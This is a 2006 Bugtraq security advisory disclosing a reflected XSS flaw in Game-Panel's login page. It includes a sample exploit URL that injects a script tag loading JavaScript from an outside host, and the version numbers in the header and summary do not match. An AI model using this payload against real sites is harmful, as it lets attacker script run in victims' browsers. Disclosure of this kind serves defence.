[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Game-Panel <= 2.1.6 XSS
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Game-Panel <= 2.1.6 XSS
- From: retard@xxxxxxxxxx
- Date: 4 Mar 2006 20:28:03 -0000
ORIGIONAL SOURCE: http://notlegal.ws/gamepanel.txt
summary
software: Game-Panel
vendors website: http://game-panel.com
versions: <= 2.6.1
class: remote
status: unpatched
exploit: available
solution: not available
discovered by: sycko
risk level: medium
description
game-panel uses a global variable to print out
error messages on their login page allowing
execution of javascript
exploit(s)
http://example.com/login.php?message=%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
credit
author(s): retard, jim, and sycko
email: retard@xxxxxxxxxx